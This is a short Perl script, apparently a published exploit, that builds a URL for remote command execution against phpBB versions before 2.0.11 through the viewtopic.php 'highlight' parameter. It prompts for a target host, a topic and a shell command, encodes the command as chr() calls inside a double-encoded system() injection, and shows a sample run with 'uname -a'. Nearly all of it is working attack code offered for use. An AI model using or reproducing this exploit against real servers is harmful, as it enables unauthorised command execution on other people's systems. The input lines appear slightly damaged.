#!/usr/bin/perl -w # Code that automate the creation of the URL to exploit phpBB < 2.0.11 # Discovered by Zeelock and descibed at http://www.securityfocus.com/bid/10701 # and http://www.packetstormsecurity.org/0411-exploits/phpbb2011.txt # Fix: http://www.securityfocus.com/bid/10701/solution/ # # Example of execution: # # Insert the hostname of the target, with, if necessary, # the directory where phpBB is installed (ex. http://www.hostname.com/phpbb/): http://www.hostname.com/phpbb/ # Insert a valid topic number (viewtopic.php?t=[topic_number]): 542 # Insert the command to execute on the target: uname -a # This is the final URL: http://www.hostname.com/phpbb/viewtopic.php?t=542&highlight=%2527%252esystem(chr(117) # %252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97))%252e%2527 # # by albythebest - http://albythebest.altervista.org/ print "#########################################################\n"; print "# phpBB < 2.0.11 Vulnerability URL Creator - BID: 10701 #\n"; print "#########################################################\n"; print " http://albythebest.altervista.org/\n\n"; print "Insert the hostname of the target, with, if necessary, the directory where phpBB is installed (ex. http://www.hostname.com/phpbb/): "; $host=; chomp $host; print "Insert a valid topic number (viewtopic.php?t=[topic_number]): "; $topic=; chomp $topic; print "Insert the command to execute on the target: "; $comando=; chomp $comando; @command=split(//,$comando); print "This is the final URL: ",$host,"viewtopic.php?t=",$topic,"&highlight=%2527%252esystem(chr("; print ord("$command[0]"); for($indice=1;$indice<@command;$indice++) { print ")%252echr(",ord("$command[$indice]"); } print "))%252e%2527\n";